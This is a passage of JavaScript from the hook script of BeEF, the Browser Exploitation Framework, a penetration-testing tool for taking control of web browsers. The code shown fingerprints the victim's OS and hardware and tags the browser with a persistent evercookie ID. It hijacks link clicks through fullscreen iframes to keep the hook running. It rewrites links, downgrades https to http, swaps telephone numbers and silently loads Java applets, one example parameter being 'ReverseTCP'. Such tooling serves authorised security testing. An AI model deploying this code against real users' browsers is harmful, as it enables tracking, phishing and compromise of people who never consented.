  4328. cookiesEnabled = (this.getCookie(name) == null)? false:true;
  4329. this.deleteCookie(name, '/', '');
  4330. return cookiesEnabled;
  4331.  
  4332. }
  4333.  
  4334. };
  4335.  
  4336. beef.regCmp('beef.browser.cookie');
  4337.  
  4338. //
  4339. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  4340. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  4341. // See the file 'doc/COPYING' for copying permission
  4342. //
  4343.  
  4344. /*!
  4345. * @literal object: beef.browser.popup
  4346. *
  4347. * Provides fuctions for working with cookies.
  4348. * Several functions adopted from http://davidwalsh.name/popup-block-javascript
  4349. * Original author unknown.
  4350. *
  4351. */
  4352. beef.browser.popup = {
  4353.  
  4354. blocker_enabled: function ()
  4355. {
  4356. screenParams = beef.browser.getScreenSize();
  4357. var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
  4358. if (popUp == null || typeof(popUp)=='undefined') {
  4359. return true;
  4360. } else {
  4361. popUp.close();
  4362. return false;
  4363. }
  4364. }
  4365. };
  4366.  
  4367. beef.regCmp('beef.browser.popup');
  4368.  
  4369.  
  4370. //
  4371. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  4372. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  4373. // See the file 'doc/COPYING' for copying permission
  4374. //
  4375.  
  4376. /*!
  4377. * @literal object: beef.session
  4378. *
  4379. * Provides basic session functions.
  4380. */
  4381. beef.session = {
  4382.  
  4383. hook_session_id_length: 80,
  4384. hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
  4385. ec: new evercookie(),
  4386. beefhook: "BEEFHOOK",
  4387.  
  4388. /**
  4389. * Gets a string which will be used to identify the hooked browser session
  4390. *
  4391. * @example: var hook_session_id = beef.session.get_hook_session_id();
  4392. */
  4393. get_hook_session_id: function() {
  4394. // check if the browser is already known to the framework
  4395. var id = this.ec.evercookie_cookie(beef.session.beefhook);
  4396. if (typeof id == 'undefined') {
  4397. var id = this.ec.evercookie_userdata(beef.session.beefhook);
  4398. }
  4399. if (typeof id == 'undefined') {
  4400. var id = this.ec.evercookie_window(beef.session.beefhook);
  4401. }
  4402.  
  4403. // if the browser is not known create a hook session id and set it
  4404. if ((typeof id == 'undefined') || (id == null)) {
  4405. id = this.gen_hook_session_id();
  4406. this.set_hook_session_id(id);
  4407. }
  4408.  
  4409. // return the hooked browser session identifier
  4410. return id;
  4411. },
  4412.  
  4413. /**
  4414. * Sets a string which will be used to identify the hooked browser session
  4415. *
  4416. * @example: beef.session.set_hook_session_id('RANDOMSTRING');
  4417. */
  4418. set_hook_session_id: function(id) {
  4419. // persist the hook session id
  4420. this.ec.evercookie_cookie(beef.session.beefhook, id);
  4421. this.ec.evercookie_userdata(beef.session.beefhook, id);
  4422. this.ec.evercookie_window(beef.session.beefhook, id);
  4423. },
  4424.  
  4425. /**
  4426. * Generates a random string using the chars in hook_session_id_chars.
  4427. *
  4428. * @example: beef.session.gen_hook_session_id();
  4429. */
  4430. gen_hook_session_id: function() {
  4431. // init the return value
  4432. var hook_session_id = "";
  4433.  
  4434. // construct the random string
  4435. for(var i=0; i<this.hook_session_id_length; i++) {
  4436. var rand_num = Math.floor(Math.random()*this.hook_session_id_chars.length);
  4437. hook_session_id += this.hook_session_id_chars.charAt(rand_num);
  4438. }
  4439.  
  4440. return hook_session_id;
  4441. }
  4442. };
  4443.  
  4444. beef.regCmp('beef.session');
  4445.  
  4446.  
  4447. //
  4448. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  4449. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  4450. // See the file 'doc/COPYING' for copying permission
  4451. //
  4452.  
  4453. beef.os = {
  4454.  
  4455. ua: navigator.userAgent,
  4456.  
  4457. isWin311: function() {
  4458. return (this.ua.match('(Win16)')) ? true : false;
  4459. },
  4460.  
  4461. isWinNT4: function() {
  4462. return (this.ua.match('(Windows NT 4.0)')) ? true : false;
  4463. },
  4464.  
  4465. isWin95: function() {
  4466. return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
  4467. },
  4468. isWinCE: function() {
  4469. return (this.ua.match('(Windows CE)')) ? true : false;
  4470. },
  4471.  
  4472. isWin98: function() {
  4473. return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
  4474. },
  4475.  
  4476. isWinME: function() {
  4477. return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
  4478. },
  4479.  
  4480. isWin2000: function() {
  4481. return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
  4482. },
  4483.  
  4484. isWin2000SP1: function() {
  4485. return (this.ua.match('Windows NT 5.01 ')) ? true : false;
  4486. },
  4487.  
  4488. isWinXP: function() {
  4489. return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
  4490. },
  4491.  
  4492. isWinServer2003: function() {
  4493. return (this.ua.match('(Windows NT 5.2)')) ? true : false;
  4494. },
  4495.  
  4496. isWinVista: function() {
  4497. return (this.ua.match('(Windows NT 6.0)')) ? true : false;
  4498. },
  4499.  
  4500. isWin7: function() {
  4501. return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
  4502. },
  4503.  
  4504. isWin8: function() {
  4505. return (this.ua.match('(Windows NT 6.2)')) ? true : false;
  4506. },
  4507.  
  4508. isOpenBSD: function() {
  4509. return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
  4510. },
  4511.  
  4512. isSunOS: function() {
  4513. return (this.ua.indexOf('SunOS') != -1) ? true : false;
  4514. },
  4515.  
  4516. isLinux: function() {
  4517. return (this.ua.match('(Linux)|(X11)')) ? true : false;
  4518. },
  4519.  
  4520. isMacintosh: function() {
  4521. return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
  4522. },
  4523.  
  4524. isWinPhone: function() {
  4525. return (this.ua.match('(Windows Phone)')) ? true : false;
  4526. },
  4527.  
  4528. isIphone: function() {
  4529. return (this.ua.indexOf('iPhone') != -1) ? true : false;
  4530. },
  4531.  
  4532. isIpad: function() {
  4533. return (this.ua.indexOf('iPad') != -1) ? true : false;
  4534. },
  4535.  
  4536. isIpod: function() {
  4537. return (this.ua.indexOf('iPod') != -1) ? true : false;
  4538. },
  4539.  
  4540. isNokia: function() {
  4541. return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
  4542. },
  4543.  
  4544. isAndroid: function() {
  4545. return (this.ua.match('Android')) ? true : false;
  4546. },
  4547.  
  4548. isBlackBerry: function() {
  4549. return (this.ua.match('BlackBerry')) ? true : false;
  4550. },
  4551.  
  4552. isWebOS: function() {
  4553. return (this.ua.match('webOS')) ? true : false;
  4554. },
  4555.  
  4556. isQNX: function() {
  4557. return (this.ua.match('QNX')) ? true : false;
  4558. },
  4559.  
  4560. isBeOS: function() {
  4561. return (this.ua.match('BeOS')) ? true : false;
  4562. },
  4563.  
  4564. isWindows: function() {
  4565. return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
  4566. },
  4567.  
  4568. getName: function() {
  4569. //Windows
  4570. if(this.isWin311()) return 'Windows 3.11';
  4571. if(this.isWinNT4()) return 'Windows NT 4';
  4572. if(this.isWinCE()) return 'Windows CE';
  4573. if(this.isWin95()) return 'Windows 95';
  4574. if(this.isWin98()) return 'Windows 98';
  4575. if(this.isWinME()) return 'Windows Millenium';
  4576. if(this.isWin2000()) return 'Windows 2000';
  4577. if(this.isWin2000SP1()) return 'Windows 2000 SP1';
  4578. if(this.isWinXP()) return 'Windows XP';
  4579. if(this.isWinServer2003()) return 'Windows Server 2003';
  4580. if(this.isWinVista()) return 'Windows Vista';
  4581. if(this.isWin7()) return 'Windows 7';
  4582. if(this.isWin8()) return 'Windows 8';
  4583.  
  4584. //Nokia
  4585. if(this.isNokia()) {
  4586.  
  4587. if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
  4588. if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
  4589. if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
  4590.  
  4591. //return 'Nokia';
  4592. }
  4593.  
  4594. // BlackBerry
  4595. if(this.isBlackBerry()) return 'BlackBerry OS';
  4596.  
  4597. // Android
  4598. if(this.isAndroid()) return 'Android';
  4599.  
  4600. //linux
  4601. if(this.isLinux()) return 'Linux';
  4602. if(this.isSunOS()) return 'Sun OS';
  4603.  
  4604. //iPhone
  4605. if (this.isIphone()) return 'iOS';
  4606. //iPad
  4607. if (this.isIpad()) return 'iOS';
  4608. //iPod
  4609. if (this.isIpod()) return 'iOS';
  4610.  
  4611. // zune
  4612. //if (this.isZune()) return 'Zune';
  4613.  
  4614. //macintosh
  4615. if(this.isMacintosh()) {
  4616. if((typeof navigator.oscpu != 'undefined') && (navigator.oscpu.indexOf('Mac OS')!=-1))
  4617. return navigator.oscpu;
  4618.  
  4619. return 'Macintosh';
  4620. }
  4621.  
  4622. //others
  4623. if(this.isQNX()) return 'QNX';
  4624. if(this.isBeOS()) return 'BeOS';
  4625. if(this.isWebOS()) return 'webOS';
  4626.  
  4627. return 'unknown';
  4628. }
  4629. };
  4630.  
  4631. beef.regCmp('beef.net.os');
  4632.  
  4633.  
  4634. //
  4635. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  4636. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  4637. // See the file 'doc/COPYING' for copying permission
  4638. //
  4639.  
  4640. beef.hardware = {
  4641.  
  4642. ua: navigator.userAgent,
  4643.  
  4644. cpuType: function() {
  4645. // IE
  4646. if (typeof navigator.cpuClass != 'undefined') {
  4647. cpu = navigator.cpuClass;
  4648. if (cpu == "x86") return "32-bit";
  4649. if (cpu == "68K") return "Motorola 68K";
  4650. if (cpu == "PPC") return "Motorola PPC";
  4651. if (cpu == "Alpha") return "Digital";
  4652. if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
  4653. if (this.ua.match('Win64; x64')) return "64-bit (AMD)";
  4654. // Firefox
  4655. } else if (typeof navigator.oscpu != 'undefined') {
  4656. if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
  4657. }
  4658. if (navigator.platform.toLowerCase() == "win64") return "64-bit";
  4659. return "32-bit";
  4660. },
  4661.  
  4662. isTouchEnabled: function() {
  4663. if ('ontouchstart' in document) return true;
  4664. return false;
  4665. },
  4666.  
  4667. isVirtualMachine: function() {
  4668. if (screen.width % 2 || screen.height % 2) return true;
  4669. return false;
  4670. },
  4671.  
  4672. isLaptop: function() {
  4673. // Most common laptop screen resolution
  4674. if (screen.width == 1366 && screen.height == 768) return true;
  4675. // Netbooks
  4676. if (screen.width == 1024 && screen.height == 600) return true;
  4677. return false;
  4678. },
  4679.  
  4680. isNokia: function() {
  4681. return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
  4682. },
  4683.  
  4684. isZune: function() {
  4685. return (this.ua.match('ZuneWP7')) ? true : false;
  4686. },
  4687.  
  4688. isHtc: function() {
  4689. return (this.ua.match('HTC')) ? true : false;
  4690. },
  4691.  
  4692. isEricsson: function() {
  4693. return (this.ua.match('Ericsson')) ? true : false;
  4694. },
  4695.  
  4696. isMotorola: function() {
  4697. return (this.ua.match('Motorola')) ? true : false;
  4698. },
  4699.  
  4700. isGoogle: function() {
  4701. return (this.ua.match('Nexus One')) ? true : false;
  4702. },
  4703.  
  4704. /**
  4705. * Returns true if the browser is on a Mobile Phone
  4706. * @return: {Boolean} true or false
  4707. *
  4708. * @example: if(beef.hardware.isMobilePhone()) { ... }
  4709. **/
  4710. isMobilePhone: function() {
  4711. return DetectMobileQuick();
  4712. },
  4713.  
  4714. getName: function() {
  4715. var ua = navigator.userAgent.toLowerCase();
  4716. if(DetectIphone()) { return "iPhone"};
  4717. if(DetectIpod()) { return "iPod Touch"};
  4718. if(DetectIpad()) { return "iPad"};
  4719. if (this.isHtc()) { return 'HTC'};
  4720. if (this.isMotorola()) { return 'Motorola'};
  4721. if (this.isZune()) { return 'Zune'};
  4722. if (this.isGoogle()) { return 'Google Nexus One'};
  4723. if (this.isEricsson()) { return 'Ericsson'};
  4724. if(DetectAndroidPhone()) { return "Android Phone"};
  4725. if(DetectAndroidTablet()) { return "Android Tablet"};
  4726. if(DetectS60OssBrowser()) { return "Nokia S60 Open Source"};
  4727. if(ua.search(deviceS60) > -1) { return "Nokia S60"};
  4728. if(ua.search(deviceS70) > -1) { return "Nokia S70"};
  4729. if(ua.search(deviceS80) > -1) { return "Nokia S80"};
  4730. if(ua.search(deviceS90) > -1) { return "Nokia S90"};
  4731. if(ua.search(deviceSymbian) > -1) { return "Nokia Symbian"};
  4732. if (this.isNokia()) { return 'Nokia'};
  4733. if(DetectWindowsPhone7()) { return "Windows Phone 7"};
  4734. if(DetectWindowsMobile()) { return "Windows Mobile"};
  4735. if(DetectBlackBerryTablet()) { return "BlackBerry Tablet"};
  4736. if(DetectBlackBerryWebKit()) { return "BlackBerry OS 6"};
  4737. if(DetectBlackBerryTouch()) { return "BlackBerry Touch"};
  4738. if(DetectBlackBerryHigh()) { return "BlackBerry OS 5"};
  4739. if(DetectBlackBerry()) { return "BlackBerry"};
  4740. if(DetectPalmOS()) { return "Palm OS"};
  4741. if(DetectPalmWebOS()) { return "Palm Web OS"};
  4742. if(DetectGarminNuvifone()) { return "Gamin Nuvifone"};
  4743. if(DetectArchos()) { return "Archos"}
  4744. if(DetectBrewDevice()) { return "Brew"};
  4745. if(DetectDangerHiptop()) { return "Danger Hiptop"};
  4746. if(DetectMaemoTablet()) { return "Maemo Tablet"};
  4747. if(DetectSonyMylo()) { return "Sony Mylo"};
  4748. if(DetectAmazonSilk()) { return "Kindle Fire"};
  4749. if(DetectKindle()) { return "Kindle"};
  4750. if(DetectSonyPlaystation()) { return "Playstation"};
  4751. if(ua.search(deviceNintendoDs) > -1) { return "Nintendo DS"};
  4752. if(ua.search(deviceWii) > -1) { return "Nintendo Wii"};
  4753. if(ua.search(deviceNintendo) > -1) { return "Nintendo"};
  4754. if(DetectXbox()) { return "Xbox"};
  4755. if(this.isLaptop()) { return "Laptop"};
  4756. if(this.isVirtualMachine()) { return "Virtual Machine"};
  4757.  
  4758. return 'Unknown';
  4759. }
  4760. };
  4761.  
  4762. beef.regCmp('beef.hardware');
  4763.  
  4764.  
  4765. //
  4766. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  4767. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  4768. // See the file 'doc/COPYING' for copying permission
  4769. //
  4770.  
  4771. /*!
  4772. * @literal object: beef.dom
  4773. *
  4774. * Provides functionality to manipulate the DOM.
  4775. */
  4776. beef.dom = {
  4777.  
  4778. /**
  4779. * Generates a random ID for HTML elements
  4780. * @param: {String} prefix: a custom prefix before the random id. defaults to "beef-"
  4781. * @return: generated id
  4782. */
  4783. generateID: function(prefix) {
  4784. return ((prefix == null) ? 'beef-' : prefix)+Math.floor(Math.random()*99999);
  4785. },
  4786.  
  4787. /**
  4788. * Creates a new element but does not append it to the DOM.
  4789. * @param: {String} the name of the element.
  4790. * @param: {Literal Object} the attributes of that element.
  4791. * @return: the created element.
  4792. */
  4793. createElement: function(type, attributes) {
  4794. var el = document.createElement(type);
  4795.  
  4796. for(index in attributes) {
  4797. if(typeof attributes[index] == 'string') {
  4798. el.setAttribute(index, attributes[index]);
  4799. }
  4800. }
  4801.  
  4802. return el;
  4803. },
  4804.  
  4805. /**
  4806. * Removes element from the DOM.
  4807. * @param: {String or DOM Object} the target element to be removed.
  4808. */
  4809. removeElement: function(el) {
  4810. if (!beef.dom.isDOMElement(el))
  4811. {
  4812. el = document.getElementById(el);
  4813. }
  4814. try {
  4815. el.parentNode.removeChild(el);
  4816. } catch (e) { }
  4817. },
  4818.  
  4819. /**
  4820. * Tests if the object is a DOM element.
  4821. * @param: {Object} the DOM element.
  4822. * @return: true if the object is a DOM element.
  4823. */
  4824. isDOMElement: function(obj) {
  4825. return (obj.nodeType) ? true : false;
  4826. },
  4827.  
  4828. /**
  4829. * Creates an invisible iframe on the hook browser's page.
  4830. * @return: the iframe.
  4831. */
  4832. createInvisibleIframe: function() {
  4833. var iframe = this.createElement('iframe', {
  4834. width: '1px',
  4835. height: '1px',
  4836. style: 'visibility:hidden;'
  4837. });
  4838.  
  4839. document.body.appendChild(iframe);
  4840.  
  4841. return iframe;
  4842. },
  4843.  
  4844. /**
  4845. * Returns the highest current z-index
  4846. * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
  4847. * @return: {Integer} Highest z-index in the DOM
  4848. * OR
  4849. * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
  4850. */
  4851. getHighestZindex: function(include_id) {
  4852. var highest = {'height':0, 'elem':''};
  4853. $j('*').each(function() {
  4854. var current_high = parseInt($j(this).css("zIndex"),10);
  4855. if (current_high > highest.height) {
  4856. highest.height = current_high;
  4857. highest.elem = $j(this).attr('id');
  4858. }
  4859. });
  4860.  
  4861. if (include_id) {
  4862. return highest;
  4863. } else {
  4864. return highest.height;
  4865. }
  4866. },
  4867.  
  4868. /**
  4869. * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
  4870. * example usage in the code: beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
  4871. * @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
  4872. * @param: {String} method: can be 'GET' or 'POST'. defaults to GET
  4873. * @param: {Hash} params: list of params that will be sent in request.
  4874. * @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
  4875. * @param: {Function} a callback function to fire once the iFrame has loaded
  4876. * @return: {Object} the inserted iFrame
  4877. */
  4878. createIframe: function(type, method, params, styles, onload) {
  4879. var css = {};
  4880. var form_submit = (method.toLowerCase() == 'post') ? true : false;
  4881. if (form_submit && params['src'])
  4882. {
  4883. var form_action = params['src'];
  4884. params['src'] = '';
  4885. }
  4886. if (type == 'hidden') {
  4887. css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
  4888. } else if (type == 'fullscreen') {
  4889. css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
  4890. $j('body').css({'padding':'0px', 'margin':'0px'});
  4891. } else {
  4892. css = styles;
  4893. $j('body').css({'padding':'0px', 'margin':'0px'});
  4894. }
  4895. var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
  4896.  
  4897. if (form_submit && form_action)
  4898. {
  4899. var id = beef.dom.generateID();
  4900. $j(iframe).attr({'id': id, 'name':id});
  4901. var form = beef.dom.createForm({'action':form_action, 'method':'get', 'target':id}, false);
  4902. $j(form).prependTo('body').submit();
  4903. }
  4904. return iframe;
  4905. },
  4906.  
  4907. /**
  4908. * Load the link (href value) in an overlay foreground iFrame.
  4909. * The BeEF hook continues to run in background.
  4910. * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
  4911. * Framebusting techniques, this will not work.
  4912. */
  4913. persistentIframe: function(){
  4914. $j('a').click(function(e) {
  4915. if ($j(this).attr('href') != '')
  4916. {
  4917. e.preventDefault();
  4918. beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
  4919. $j(document).attr('title', $j(this).html());
  4920. document.body.scroll = "no";
  4921. document.documentElement.style.overflow = 'hidden';
  4922. }
  4923. });
  4924. },
  4925.  
  4926. /**
  4927. * Load a full screen div that is black, or, transparent
  4928. * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
  4929. * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
  4930. * opacity:0-100 // Lower number = less grayout higher = more of a blackout
  4931. * // By default this is 70
  4932. * zindex: # // HTML elements with a higher zindex appear on top of the gray out
  4933. * // By default this will use beef.dom.getHighestZindex to always go to the top
  4934. * bgcolor: (#xxxxxx) // Standard RGB Hex color code
  4935. * // By default this is #000000
  4936. */
  4937. grayOut: function(vis, options) {
  4938. // in any order. Pass only the properties you need to set.
  4939. var options = options || {};
  4940. var zindex = options.zindex || beef.dom.getHighestZindex()+1;
  4941. var opacity = options.opacity || 70;
  4942. var opaque = (opacity / 100);
  4943. var bgcolor = options.bgcolor || '#000000';
  4944. var dark=document.getElementById('darkenScreenObject');
  4945. if (!dark) {
  4946. // The dark layer doesn't exist, it's never been created. So we'll
  4947. // create it here and apply some basic styles.
  4948. // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
  4949. var tbody = document.getElementsByTagName("body")[0];
  4950. var tnode = document.createElement('div'); // Create the layer.
  4951. tnode.style.position='absolute'; // Position absolutely
  4952. tnode.style.top='0px'; // In the top
  4953. tnode.style.left='0px'; // Left corner of the page
  4954. tnode.style.overflow='hidden'; // Try to avoid making scroll bars
  4955. tnode.style.display='none'; // Start out Hidden
  4956. tnode.id='darkenScreenObject'; // Name it so we can find it later
  4957. tbody.appendChild(tnode); // Add it to the web page
  4958. dark=document.getElementById('darkenScreenObject'); // Get the object.
  4959. }
  4960. if (vis) {
  4961. // Calculate the page width and height
  4962. if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
  4963. var pageWidth = document.body.scrollWidth+'px';
  4964. var pageHeight = document.body.scrollHeight+'px';
  4965. } else if( document.body.offsetWidth ) {
  4966. var pageWidth = document.body.offsetWidth+'px';
  4967. var pageHeight = document.body.offsetHeight+'px';
  4968. } else {
  4969. var pageWidth='100%';
  4970. var pageHeight='100%';
  4971. }
  4972. //set the shader to cover the entire page and make it visible.
  4973. dark.style.opacity=opaque;
  4974. dark.style.MozOpacity=opaque;
  4975. dark.style.filter='alpha(opacity='+opacity+')';
  4976. dark.style.zIndex=zindex;
  4977. dark.style.backgroundColor=bgcolor;
  4978. dark.style.width= pageWidth;
  4979. dark.style.height= pageHeight;
  4980. dark.style.display='block';
  4981. } else {
  4982. dark.style.display='none';
  4983. }
  4984. },
  4985.  
  4986. /**
  4987. * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
  4988. * or, re-writing a document this is useful.
  4989. */
  4990. removeStylesheets: function() {
  4991. $j('link[rel=stylesheet]').remove();
  4992. $j('style').remove();
  4993. },
  4994.  
  4995. /**
  4996. * Create a form element with the specified parameters, appending it to the DOM if append == true
  4997. * @param: {Hash} params: params to be applied to the form element
  4998. * @param: {Boolean} append: automatically append the form to the body
  4999. * @return: {Object} a form object
  5000. */
  5001. createForm: function(params, append) {
  5002. var form = $j('<form></form>').attr(params);
  5003. if (append)
  5004. $j('body').append(form);
  5005. return form;
  5006. },
  5007.  
  5008. /**
  5009. * Get the location of the current page.
  5010. * @return: the location.
  5011. */
  5012. getLocation: function() {
  5013. return document.location.href;
  5014. },
  5015.  
  5016. /**
  5017. * Get links of the current page.
  5018. * @return: array of URLs.
  5019. */
  5020. getLinks: function() {
  5021. var linksarray = [];
  5022. var links = document.links;
  5023. for(var i = 0; i<links.length; i++) {
  5024. linksarray = linksarray.concat(links[i].href)
  5025. };
  5026. return linksarray
  5027. },
  5028.  
  5029. /**
  5030. * Rewrites all links matched by selector to url, also rebinds the click method to simply return true
  5031. * @param: {String} url: the url to be rewritten
  5032. * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
  5033. * @return: {Number} the amount of links found in the DOM and rewritten.
  5034. */
  5035. rewriteLinks: function(url, selector) {
  5036. var sel = (selector == null) ? 'a' : selector;
  5037. return $j(sel).each(function() {
  5038. if ($j(this).attr('href') != null)
  5039. {
  5040. $j(this).attr('href', url).click(function() { return true; });
  5041. }
  5042. }).length;
  5043. },
  5044.  
  5045. /**
  5046. * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
  5047. * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
  5048. * @param: {String} url: the url to be rewritten
  5049. * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
  5050. * @return: {Number} the amount of links found in the DOM and rewritten.
  5051. */
  5052. rewriteLinksClickEvents: function(url, selector) {
  5053. var sel = (selector == null) ? 'a' : selector;
  5054. return $j(sel).each(function() {
  5055. if ($j(this).attr('href') != null)
  5056. {
  5057. $j(this).click(function() {this.href=url});
  5058. }
  5059. }).length;
  5060. },
  5061.  
  5062. /**
  5063. * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
  5064. * @param: {String} old_protocol: the old link protocol to be rewritten
  5065. * @param: {String} new_protocol: the new link protocol to be written
  5066. * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
  5067. * @return: {Number} the amount of links found in the DOM and rewritten.
  5068. */
  5069. rewriteLinksProtocol: function(old_protocol, new_protocol, selector) {
  5070.  
  5071. var count = 0;
  5072. var re = new RegExp(old_protocol+"://", "gi");
  5073. var sel = (selector == null) ? 'a' : selector;
  5074.  
  5075. $j(sel).each(function() {
  5076. if ($j(this).attr('href') != null) {
  5077. var url = $j(this).attr('href');
  5078. if (url.match(re)) {
  5079. $j(this).attr('href', url.replace(re, new_protocol+"://")).click(function() { return true; });
  5080. count++;
  5081. }
  5082. }
  5083. });
  5084.  
  5085. return count;
  5086. },
  5087.  
  5088. /**
  5089. * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
  5090. * @param: {String} new_number: the new link telephone number to be written
  5091. * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
  5092. * @return: {Number} the amount of links found in the DOM and rewritten.
  5093. */
  5094. rewriteTelLinks: function(new_number, selector) {
  5095.  
  5096. var count = 0;
  5097. var re = new RegExp("tel:/?/?.*", "gi");
  5098. var sel = (selector == null) ? 'a' : selector;
  5099.  
  5100. $j(sel).each(function() {
  5101. if ($j(this).attr('href') != null) {
  5102. var url = $j(this).attr('href');
  5103. if (url.match(re)) {
  5104. $j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
  5105. count++;
  5106. }
  5107. }
  5108. });
  5109.  
  5110. return count;
  5111. },
  5112.  
  5113. /**
  5114. * Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
  5115. * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
  5116. * @return: {String} the parameters as a string ready to append to applet/embed/object tags (ex.: <param name='abc' value='test' />).
  5117. */
  5118. parseAppletParams: function(params){
  5119. var result = '';
  5120. for (i in params){
  5121. var param = params[i];
  5122. for(key in param){
  5123. result += "<param name='" + key + "' value='" + param[key] + "' />";
  5124. }
  5125. }
  5126. return result;
  5127. },
  5128.  
  5129. /**
  5130. * Attach an applet to the DOM, using the best approach for differet browsers (object/applet/embed).
  5131. * example usage in the code, using a JAR archive (recommended and faster):
  5132. * beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D.class', null, 'http://127.0.0.1:3000/ui/media/images/target.jar', [{'param1':'1', 'param2':'2'}]);
  5133. * example usage in the code, using codebase:
  5134. * beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D', 'http://127.0.0.1:3000/', null, null);
  5135. * @params: {String} id: reference identifier to the applet.
  5136. * @params: {String} code: name of the class to be loaded. For example, beef.class.
  5137. * @params: {String} codebase: the URL of the codebase (usually used when loading a single class for an unsigned applet).
  5138. * @params: {String} archive: the jar that contains the code.
  5139. * @params: {String} params: an array of additional params that the applet except.
  5140. */
  5141. attachApplet: function(id, name, code, codebase, archive, params) {
  5142. var content = null;
  5143. if (beef.browser.isIE()) {
  5144. content = "" + // the classid means 'use the latest JRE available to launch the applet'
  5145. "<object id='" + id + "'classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' " +
  5146. "height='0' width='0' name='" + name + "'> " +
  5147. "<param name='code' value='" + code + "' />";
  5148.  
  5149. if (codebase != null) {
  5150. content += "<param name='codebase' value='" + codebase + "' />"
  5151. }
  5152. if (archive != null){
  5153. content += "<param name='archive' value='" + archive + "' />";
  5154. }
  5155. if (params != null) {
  5156. content += beef.dom.parseAppletParams(params);
  5157. }
  5158. content += "</object>";
  5159. }
  5160. if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
  5161.  
  5162. if (codebase != null) {
  5163. content = "" +
  5164. "<applet id='" + id + "' code='" + code + "' " +
  5165. "codebase='" + codebase + "' " +
  5166. "height='0' width='0' name='" + name + "'>";
  5167. } else {
  5168. content = "" +
  5169. "<applet id='" + id + "' code='" + code + "' " +
  5170. "archive='" + archive + "' " +
  5171. "height='0' width='0' name='" + name + "'>";
  5172. }
  5173.  
  5174. if (params != null) {
  5175. content += beef.dom.parseAppletParams(params);
  5176. }
  5177. content += "</applet>";
  5178. }
  5179. // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
  5180. // if (beef.browser.isFF()) {
  5181. // if (codebase != null) {
  5182. // content = "" +
  5183. // "<embed id='" + id + "' code='" + code + "' " +
  5184. // "type='application/x-java-applet' codebase='" + codebase + "' " +
  5185. // "height='0' width='0' name='" + name + "'>";
  5186. // } else {
  5187. // content = "" +
  5188. // "<embed id='" + id + "' code='" + code + "' " +
  5189. // "type='application/x-java-applet' archive='" + archive + "' " +
  5190. // "height='0' width='0' name='" + name + "'>";
  5191. // }
  5192. //
  5193. // if (params != null) {
  5194. // content += beef.dom.parseAppletParams(params);
  5195. // }
